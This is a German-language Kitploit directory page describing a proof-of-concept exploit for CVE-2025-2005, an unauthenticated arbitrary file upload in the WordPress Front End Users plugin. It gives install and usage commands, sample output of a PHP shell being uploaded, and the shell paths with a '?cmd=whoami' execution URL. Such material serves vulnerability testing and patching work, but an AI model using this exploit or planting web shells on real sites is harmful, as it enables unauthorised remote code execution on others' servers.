Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-2005 — WordPress FEUP Exploit für beliebigen Datei-Upload (CVE-2025-2005) | Kitploit
Tools/GitHubGitHub/mrmtwoj/cve-2025-2005
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubmrmtwoj/cve-2025-2005

CVE-2025-2005

WordPress FEUP Exploit für beliebigen Datei-Upload (CVE-2025-2005)

Repository anzeigen
313vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Webseite
Teilen

WordPress FEUP Exploit für beliebigen Datei-Upload (CVE-2025-2005)

Dieses Repository bietet einen Proof-of-Concept (PoC)-Exploit für das WordPress Front End Users Plugin (Versionen bis 3.2.32), das aufgrund fehlender MIME-/Dateityp-Überprüfung im Registrierungsformular anfällig für beliebigen Datei-Upload ist. Dadurch können nicht authentifizierte Angreifer schädliche Dateien (z. B. Webshells) hochladen, was potenziell zu Remote Code Execution (RCE) auf dem Server führen kann.

Funktionen

  • CVE-2025-2005: Schwachstelle beim Datei-Upload im WordPress Front End Users Plugin
  • Einfache Kommandozeilen-Schnittstelle
  • Automatische Erkennung von Registrierungsformularen
  • Shell-Uploader mit benutzerdefiniertem Benutzernamen/Passwort

Funktionsweise

  • Sendet eine Registrierungsanfrage an das anfällige FEUP-Registrierungsformular.
  • Lädt eine PHP-Shell über das Dateieingabefeld hoch, wobei Dateityp-Beschränkungen umgangen werden.
  • Zeigt den Upload-Status an und informiert, ob die Website anfällig ist.

Testziele

  • Sucht nach Registrierungsformularen, die enthalten:
  • ewd-feup-register-form
  • Auf URLs wie:
root@kitploit:~
/register/
/signup/
  • oder jedem Link, der auf der Startseite gefunden wird

Erste Schritte

  • Python 3.x
  • Module requests und beautifulsoup4:
root@kitploit:~
pip install requests beautifulsoup4

Installation

root@kitploit:~
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005

Verwendung

root@kitploit:~
python3 exploit.py --url http://target.com --user hacker --password pass123

Beispielausgabe

root@kitploit:~
[*] Scanne Website: http://victim.com
[*] 17 Seiten gefunden.
[+] Registrierungsformular gefunden unter: http://victim.com/register
[*] Lade Shell hoch...
[+] Shell erfolgreich hochgeladen!

Exploit ausführen

root@kitploit:~
Ort ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
AUSFÜHREN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami
Tool herunterladen